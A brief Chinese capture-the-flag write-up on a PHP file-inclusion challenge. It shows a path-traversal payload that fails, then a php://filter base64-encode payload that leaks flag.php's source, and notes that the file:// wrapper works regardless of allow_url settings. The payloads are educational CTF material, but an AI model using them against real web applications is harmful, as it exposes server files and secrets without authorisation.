点击tips
查看元素,也并没有有用的信息,联想到题目,include
想起了文件包含漏洞。
构造payload
?file=/../../../../../../flag.php
没有返回东西。看完wq学到了一个新姿势:
php伪代码
构造payload
?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base64加密后的flag.php文件,丢去解密得到flag。
————————————————————————————————————————————————————————————————————————————————————————————————————————————————————
【file://协议】
PHP.ini:
file:// 协议在双off的情况下也可以正常使用;
allow_url_fopen :off/on
allow_url_include:off/on